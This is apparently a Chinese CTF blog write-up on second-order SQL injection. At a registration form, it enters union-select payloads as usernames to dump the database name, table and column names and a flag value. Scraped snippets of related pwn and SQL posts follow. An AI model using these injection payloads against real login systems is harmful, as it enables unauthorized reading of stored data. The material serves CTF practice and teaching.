代码编织梦想

目录

一、根据题目发现是个登录、注册框

二、在注册的时候添加命令并登录


一、根据题目发现是个登录、注册框

二、在注册的时候添加命令并登录

用户名:查库命令:1’union select database() #		密码:123456

用户名:查表命令:1’union select group_concat(table_name) from information_schema.tables where table_schema=”ctftraining” #	    密码:123456

 

 

用户名:查字段名:1’ union select group_concat(column_name) from information_schema.columns where table_name=”flag” #    密码:123456

 

用户名:查字段值:1’ union select flag from flag #		密码:123456

 

 

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/126323946

2020第五空间智能安全大赛PWN——twice-爱代码爱编程

0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出

Hack The Box——ScriptKiddie-爱代码爱编程

目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 该靶机比较简单,但在漏洞发现的过程中花费的时间较多。通过msfvenom APK模板命令注入漏洞获得kid用户shell,然后通过shell脚本读取的文件内容可控,构造恶意命令获得pwn用户的shell,最后利用sudo权限滥用获得root权限的shell。 信息收集 使用

buu-October 2019 Twice SQL Injection-爱代码爱编程

标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from inf

pwn基本ROP——ret2syscall-爱代码爱编程

ret2syscall 环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDA32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,

mybatuis update批量更新_雪碧喔的博客-爱代码爱编程

关键字解释 id Mapper里的方法名 parameterType Mapper传递的参数类型 支持 Collection-> List,Map,Set collection 列表名 item 列表的单个元

pwn the box——成绩查询_liebe1*1的博客-爱代码爱编程

目录 判断回显位置 查看数据库名、版本号、用户 查看skctf数据库中的表名 查看fl4g表中的字段名 查看skctf_flag字段中的字段值 判断回显位置 11111' union select 1,2,3,4 # 查看数据库名、版本号、用户 11111' union select 1,database(),version()

oracle学习88-oracle之基本的过滤和排序数据_前端歌谣的博客-爱代码爱编程

    --查询对应的列 大于5000 select employee_id,last_name,salary from employees where salary>5000 运行结果     --查询对应的日期     select last_name,hire_date from employees where hire_date=

sql 语句优化总结_何以解忧,唯有..的博客-爱代码爱编程

一、查询SQL尽量不要使用select *,而是具体字段 反例: SELECT * FROM student 正例: SELECT id,NAME FROM student 理由: 字段多时,大表能达到100

dbcp 与 c3p0连接池_abcdxy~的博客-爱代码爱编程

        数据库连接 -- 执行完毕 -- 释放         连接-- 释放 是十分浪费系统资源的         池化技术:准备一些预先的资源,过来就连接预先准备好的         编写连接池,实现一个接口DataSource 开源数据源实现 DBCPC3P0Druid:阿里巴巴         使用了这些数据库连接池之

晚饭都没吃,我一前端帮后端做了一点sql优化,才避免了通宵_肥肥技术宅的博客-爱代码爱编程

1、前言 其实感觉自己做的这点sql优化也算是比较常规的,没什么太大的难度。 最近上线了一个新系统,刚试点运行,用户量不大还没什么大问题。但随之培训和大规模用户开始使用后,问题出现了。而且出现了好多问题,大部分都是后端的,这里就不细讲了。说说与我前端相关的吧。由于我会一点后端。 后端准备叫我开mysql客户端,删除多余的数据 删就删吧,但是要删除

jdbc:使用preparedstatement操作数据表_peter-pan0421的博客-爱代码爱编程

使用PreparedStatement 操作数据表,完成增删改查操作。  一、基本增删改-操作:示例 1.通过JdbcUtils中的连接方法获取连接 conn = JdbcUtils.getConnection(); 2.预编译sql语句,返回PreparedStatement的实例 String sql = "insert into

mysql_*maybe的博客-爱代码爱编程

MySQL数据库 安装 命令行连接到MySQL 在MySQL服务启动后,输如 mysql -h localhost -P 3306 -u root -proot1234 注意:-h 和 -P不写默认就是主机和3306

mysql查询为啥慢了?_mysql数据库突然查询-爱代码爱编程

        平时拿起一本书,多么想徜徉在 知识的海洋中遨游!(想多了~)          潜意识里总是要告诉自己:你,要看书,要学习,要进步!         大脑:不想看,好累,好无聊啊!         此时方能体会“知易行难”的深意啊!         学贵有恒,人贵有志。面对手机电脑的诱惑,心底的那点脆弱不堪的防线太容易被击破了。虽说